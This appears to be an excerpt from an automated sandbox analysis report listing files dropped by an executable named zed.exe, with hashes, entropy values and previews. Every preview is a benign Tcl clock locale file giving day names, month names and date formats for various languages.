                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1152
                                                                                                                                                                                                                                            Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                                            MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                                            SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                                            SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                                            SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1354
                                                                                                                                                                                                                                            Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                                            MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                                            SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                                            SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                                            SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1208
                                                                                                                                                                                                                                            Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                                            MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                                            SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                                            SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                                            SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1276
                                                                                                                                                                                                                                            Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                                            MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                                            SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                                            SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                                            SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                                                                            Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                                            MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                                            SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                                            SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
                                                                                                                                                                                                                                            SHA-512:D63F34024356F5CE0335D14EA557F4BBF238CCA8265DD27C039C70F7F28FE737F368B030DEE10B2C536512D2815E1F5B19838D08745C6A76A39050D573597EB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_AT MONTHS_ABBREV [list \.. "J\u00e4n"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_AT MONTHS_FULL [list \.. "J\u00e4nner"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset de_AT TIME_FORMAT "%T".. ::msgcat::mcset de_AT TIME_FORMAT_12 "%T".. ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1276
                                                                                                                                                                                                                                            Entropy (8bit):4.389082225723362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83B8VSysVB8VsZKKgJ5Mm47fpK26aSIui7dHqWZ0ZIlj5VevjevbDvW:43Bt1VBbZKKgJs6qx1Wc5VojobzW
                                                                                                                                                                                                                                            MD5:C351057D8E5328C0790901D1F4DBEC9F
                                                                                                                                                                                                                                            SHA1:F73DE8AEF7F8083B0726760AA003E81067A68588
                                                                                                                                                                                                                                            SHA-256:532845CD15EC821C1939D000C648694A64E8CA8F0C14BAD5D79682CF991481CE
                                                                                                                                                                                                                                            SHA-512:8152AD082D0A6A4EBE7E1CCA9D4A5F2E48ABE3F09F4385A517C523A67CA3B08E0F20C193D0F6850F37E55ED0CD6FBD201FE22CC824AF170976D04DB061212F2D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \.. "Son"\.. "Mon"\.. "Die"\.. "Mit"\.. "Don"\.. "Fre"\.. "Sam"].. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de_BE MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_BE MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2304
                                                                                                                                                                                                                                            Entropy (8bit):4.371322909589862
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR833v+ZYYWtv+nWfFyL1NYOg+EKVJQ19tWQYmYaYRn9sWuSAJIJ6eRa6WrmdlX:43/pZyLjY0uYR9QmdkjC9r
                                                                                                                                                                                                                                            MD5:7DD14B1F4FF532DCAF6D4C6F0DF82E9A
                                                                                                                                                                                                                                            SHA1:707875FEF4207EBB71D066FDC54C7F68560C6DAD
                                                                                                                                                                                                                                            SHA-256:8B23E0E2F0F319BB9A2DFDCCDC565FF79A62FA85094811189B6BC41594232B6B
                                                                                                                                                                                                                                            SHA-512:5ECA072DE5DD7890270AE268C7C8D40EE2DB6966643604D16E54194DB0AD74FDA8D04848331E61B387E8B494AF18252E38671D939069EC4C90C672A629563B88
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \.. "\u039a\u03c5\u03c1"\.. "\u0394\u03b5\u03c5"\.. "\u03a4\u03c1\u03b9"\.. "\u03a4\u03b5\u03c4"\.. "\u03a0\u03b5\u03bc"\.. "\u03a0\u03b1\u03c1"\.. "\u03a3\u03b1\u03b2"].. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \.. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\.. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\.. "\u03a4\u03c1\u03af\u03c4\u03b7"\.. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\.. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\.. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\.. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"].. ::msgcat::mcset el MONTHS_ABBREV [list \.. "\u0399\u03b1\u03bd"\.. "\u03a6\u03b5\u03b2"\.. "\u039c\u03b1\u03c1"\.. "\u0391\u03c0\u03c1"\.. "\u039c\u03b1\u03ca"\.. "\u0399\u03bf\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):307
                                                                                                                                                                                                                                            Entropy (8bit):4.896073290907262
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoCwmGjbmvFjoCws6W3v1oCws6W3v6p6HyFjoCwmT+3vjbe:4EnLB383QrmdSs6W3vss6W3v6QSoJ3ve
                                                                                                                                                                                                                                            MD5:5B31AD8AC0000B01C4BD04BF6FC4784C
                                                                                                                                                                                                                                            SHA1:F55145B473DDCAE38A0F7297D58B80B12B2A5271
                                                                                                                                                                                                                                            SHA-256:705C66C14B6DE682EC7408EABDBA0800C626629E64458971BC8A4CBD3D5DB111
                                                                                                                                                                                                                                            SHA-512:1CCE6BCAE5D1F7D80E10687F0BCA2AE1B2DD53F04A0F443DC9B552804D60E708E64326B62BA4E3787325D89837B4AC8CCCA9AF6F39CBD654BCC8A9C27EA63BB8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):312
                                                                                                                                                                                                                                            Entropy (8bit):4.870560620756039
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoCr3FuoCsX3vtfNrsoCsX3v6YNIdjoCs+3v3FnN9vn:4EnLB383H3Fb3vtNN3v6y43v3FnNNn
                                                                                                                                                                                                                                            MD5:DDA87ACED97F9F7771788A1A0A1E4433
                                                                                                                                                                                                                                            SHA1:E221653CD659C095098180344654770FF059331B
                                                                                                                                                                                                                                            SHA-256:BC87754A253C1036E423FA553DA182DBC56F62A13EDA811D8CD9E8AFA40404A6
                                                                                                                                                                                                                                            SHA-512:BB95D9241B05686CA15C413746DD06071635CB070F38847BE9702397A86C01A3D54DEBE1ACAA51834AB74DB8D0F75E353995183864E382721425756EE46B0B1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z".. ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.915769170926952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xosmGMoss6W3v6ay/5osmT+3vR6HyFvn:4EnLB383hr8s6W3v6ay/hJ3voSVn
                                                                                                                                                                                                                                            MD5:4CBF90CE15ECCB6B695AA78D7D659454
                                                                                                                                                                                                                                            SHA1:30C26ADB03978C5E7288B964A14B692813D6E0B8
                                                                                                                                                                                                                                            SHA-256:EC48F18995D46F82B1CC71EA285174505A50E3BA2017BCCE2D807149B7543FD0
                                                                                                                                                                                                                                            SHA-512:CC809EBD1B2B5D9E918C2E2CE4E7075DFB0744C583F17C1C234D8437EF0C34654D2F09FF77544AD3430CEC78ABC70AA5F85F71AD1489A687B8087FCDFE07B088
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_BW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_BW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):295
                                                                                                                                                                                                                                            Entropy (8bit):4.87629705076992
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoAhgqyFjoAZF3vX5oAZF3v6cvBoAh9+3vnFDL8vn:4EnLB383FhgqWDZF3vVZF3v6cvdhI3vM
                                                                                                                                                                                                                                            MD5:BFC4A48F5B10D137A4D32B440C47D3C6
                                                                                                                                                                                                                                            SHA1:C90EF2A8291DE589BC12D0A5B8AF2F0B00FEB7CD
                                                                                                                                                                                                                                            SHA-256:3CF2D0937FD95264549CF5C768B898F01D4875A3EB4A85D457D758BC11DFEC6E
                                                                                                                                                                                                                                            SHA-512:A91B81A956A438CA7274491CA107A2647CBDFB8AEB5FD7A58238F315590C74F83F2EBA4AA5C4E9A4A54F1FC1636318E94E5E4BBEA467326E0EACED079741E640
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_CA DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_CA TIME_FORMAT "%r".. ::msgcat::mcset en_CA TIME_FORMAT_12 "%I:%M:%S %p".. ::msgcat::mcset en_CA DATE_TIME_FORMAT "%a %d %b %Y %r %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.892405843607203
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEbtvqyFjoELE3vLjoELE3v6mjoEbto+3vnFDoAkvn:4EnLB383BbtvqWHLE3vTLE3v6EbtF3vW
                                                                                                                                                                                                                                            MD5:52E55DE8C489265064A01CEEC823DCDD
                                                                                                                                                                                                                                            SHA1:16F314A56AE0EAC9DAD58ADDEA6B25813A5BAA05
                                                                                                                                                                                                                                            SHA-256:C2CE5B74F9E9C190B21C5DF4106303B7B794481228FB9A57065B9C822A1059C3
                                                                                                                                                                                                                                            SHA-512:6010F29BF75D0CB4EE4F10781423A8CC68D5018DE8C633CD1217A7FE1299A0532E8C0E5D120188B748171EB255C587BB0B64B7384A58F725F3B6A4B9EA04393E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_GB DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_GB TIME_FORMAT "%T".. ::msgcat::mcset en_GB TIME_FORMAT_12 "%T".. ::msgcat::mcset en_GB DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.851471679101967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoa+joaQ9PoaAx/G4soaYYW3v6ay/5oaAx/T+3v4x6HyFvn:4EnLB383BSiF4KxW3v6ay/B/3v4ISVn
                                                                                                                                                                                                                                            MD5:DE2A484508615D7C1377522AFF03E16C
                                                                                                                                                                                                                                            SHA1:C27C0D10E7667AD95FFF731B4E45B2C6E665CC36
                                                                                                                                                                                                                                            SHA-256:563450A38DB6C6A1911BC04F4F55B816910B3E768B1465A69F9B3BD27292DBEE
                                                                                                                                                                                                                                            SHA-512:A360B0FD7E36BCC0FB4603D622C36199E5D4C705396C6701F29730EB5CB33D81B208541CADFAED5303FC329C7C6A465D23CA9584F0DEC2DE128E258478DD6661
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_HK AM "AM".. ::msgcat::mcset en_HK PM "PM".. ::msgcat::mcset en_HK DATE_FORMAT "%B %e, %Y".. ::msgcat::mcset en_HK TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_HK DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.833246107458447
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoK6qyFjoKi+3vLjoKi+3v6mjoKv+3vnFDoAkvn:4EnLB383CqW13vJ3v6b3v9dmn
                                                                                                                                                                                                                                            MD5:57F0BBE1316D14BC41D0858902A7980A
                                                                                                                                                                                                                                            SHA1:B68BF99A021B9F01FE69341DF06F5D1453156A97
                                                                                                                                                                                                                                            SHA-256:9E0DCEE86A03B7BDD831E0008868A9B874C506315BF01DF3982AD3813FD3BA8E
                                                                                                                                                                                                                                            SHA-512:864F32254AAD39859AFC47D0C90DC5F38CA86EF0BBC7DE61BE253756C22B7806E616B59802C4F4D7B2F5543BF7C070FFF6FAF253E0A337EC443337E63A2E5A57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_IE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_IE TIME_FORMAT "%T".. ::msgcat::mcset en_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset en_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):318
                                                                                                                                                                                                                                            Entropy (8bit):4.80637980762728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoKr3ujoKrGtoKr5vMoKrw3v1oKr5o+3voAsvn:4EnLB383T9xvT3vJF3vonn
                                                                                                                                                                                                                                            MD5:1A54E506E70B2125C6016B373D3DD074
                                                                                                                                                                                                                                            SHA1:15289902BAA93208D8FB224E119166D0E044E34E
                                                                                                                                                                                                                                            SHA-256:ADEA3A1AB8AA84237DDB2F276ABDB96DCB4C51932E920D1A5E336904E1138664
                                                                                                                                                                                                                                            SHA-512:0D663233E6C96515713B3B829B605E72D8CE581AEF1C02FF6CA96598C040DCA42A3AC765EE9B5002E8969A331EB19A9AF0F8215F7113D0AD2F2EB2C560239D53
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_IN AM "AM".. ::msgcat::mcset en_IN PM "PM".. ::msgcat::mcset en_IN DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_IN TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_IN DATE_TIME_FORMAT "%d %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):307
                                                                                                                                                                                                                                            Entropy (8bit):4.939458132662909
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoyejbmvFjo63v1o63v6p6HyFjoy7+3vjb0ysvn:4EnLB383temdj3vd3v6QS1S3ven
                                                                                                                                                                                                                                            MD5:7E81708F107658FFD31C3BFBF704A488
                                                                                                                                                                                                                                            SHA1:7941ED040707591B68581337F8D90FA03C5E1406
                                                                                                                                                                                                                                            SHA-256:EC305B7CB393421E6826D8F4FEA749D3902EBA53BFA488F2B463412F4070B9ED
                                                                                                                                                                                                                                            SHA-512:8F038FF960F81D96FF9E3454D8ABDA7FFDA5B99DA304ACECC42E74DDBED839388246F66B58928DA902D3B475FBA46602B34F6829A87ECB1124FFC47C036B4DBE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_NZ DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_NZ TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_NZ TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_NZ DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.824360175945298
                                                                                                                                                                                                                                            Encrypted:false
